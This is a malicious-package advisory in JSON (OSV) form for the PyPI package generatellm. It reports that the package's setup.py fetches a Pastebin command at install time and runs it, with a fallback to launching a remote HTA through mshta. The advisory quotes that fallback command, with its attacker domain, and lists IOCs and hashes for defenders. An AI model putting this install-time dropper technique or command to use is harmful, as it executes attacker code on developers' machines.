{"id":"MAL-2026-5773","summary":"Malicious code in generatellm (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (31201af7035560c0798b46e67a374b9526a7e8ed2f856235e5eb0438d1a8d080)\nGenerateLLM 2.23 is a hollow PyPI package (placeholder metadata, no functional code under src/, only an egg-info directory) whose entire payload is an install-time remote code execution dropper. setup.py at lines 31-35 fetches https://pastebin.com/raw/yBcUM1QB, takes the first line of the response, and passes it directly to os.system via `cmd /c \"{cmd_pastebin}\"`, executing arbitrary attacker-controlled commands on the installer's machine. If the Pastebin fetch fails, setup.py line 38 falls back to `os.system('cmd /c \"mshta http://fixars.top\"')`, abusing the Windows mshta.exe LOLBin to load and execute a remote HTA application from an unrelated, non-publisher, plain-HTTP domain. Both branches fire automatically during `pip install GenerateLLM` with no user interaction. The Pastebin URL is mutable and anonymous, so the executed command can be changed by the attacker at any time without republishing the package. The generic LLM-themed name with no real author identity is consistent with namespace-squatting designed to lure developers searching for LLM tooling.\n\n## Source: kam193 (081df5df4ab9a6bd2eee1934019a75c3df660cf544d1389aa16c9057eec61f66)\nDuring installation, the code attempts to download and start a malicious executable.\n\nLikely related to 2025-08-raknet-testing-package.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-easyaillm\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - obfuscation\n\n\n - malware\n","modified":"2026-06-15T23:01:01.331182615Z","published":"2026-06-14T14:37:17Z","database_specific":{"iocs":{"domains":["fixars.top"],"urls":["https://pastebin.com/raw/hEF5HaFc","https://pastebin.com/raw/yBcUM1QBs","https://pastebin.com/raw/yBcUM1QB","http://fixars.top"]},"malicious-packages-origins":[{"source":"kam193","modified_time":"2026-06-14T14:37:17.328622Z","import_time":"2026-06-14T14:50:21.178222256Z","sha256":"081df5df4ab9a6bd2eee1934019a75c3df660cf544d1389aa16c9057eec61f66","id":"pypi/2026-06-easyaillm/generatellm","versions":["2.21","2.22","2.23"]},{"source":"amazon-inspector","modified_time":"2026-06-15T19:40:00Z","import_time":"2026-06-15T20:14:27.184426128Z","sha256":"31201af7035560c0798b46e67a374b9526a7e8ed2f856235e5eb0438d1a8d080","id":"IN-MAL-2026-006681","versions":["2.23"]},{"source":"kam193","modified_time":"2026-06-14T14:37:17.328622Z","import_time":"2026-06-15T22:45:32.25959446Z","sha256":"9182c5f6ea20cab351cbba20f0849d6a4ca28e00d06158127df48be12bc8c9eb","id":"pypi/2026-06-easyaillm/generatellm","versions":["2.21","2.22","2.23"]}]},"references":[{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection"},{
"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/generatellm"},{"type":"PACKAGE","url":"https://pypi.org/project/GenerateLLM/2.23/"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/926e8f1a7f349ff1eef31f89fa8ffe265c30b92e310e8bea19962d38f8c32129"}],"affected":[{"package":{"name":"generatellm","ecosystem":"PyPI","purl":"pkg:pypi/generatellm"},"versions":["2.21","2.22","2.23"],"database_specific":{"indicators":{"package_integrity":[{"filename":"generatellm-2.23.tar.gz","hashes":{"blake2b_256":"b46b460b73ad44d636594cca0eb3b11cd18be9f59484baf835fb3ff323da6c87","md5":"6633293c2b9e02284f5d7c0bf91584f4","sha256":"fd4e57599461f3335cbc48209a56ce88fb43ae5927aa37a5abfffe523123fbe3"}}],"evidence_files":[{"path":"setup.py","sha256":"5df3f1bad351c6096e716c53436b46a9bf48824a1fff9aa71677eedbbe302fe7","tlsh":"71112553dc477896b2f140441c316850fd62969b27a5c45bb87c435dffb06a18d76c9c"},{"path":"PKG-INFO","sha256":"db685cf44e31dc36be4e5cc4c5f02802b2c115ebd54e8ee1f0b12a86416f3b9b","tlsh":"4ee0df1471c5ddb27aa30a890908a2338122a24089ca6419e8ea0bebe25965943fd438"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/generatellm/MAL-2026-5773.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}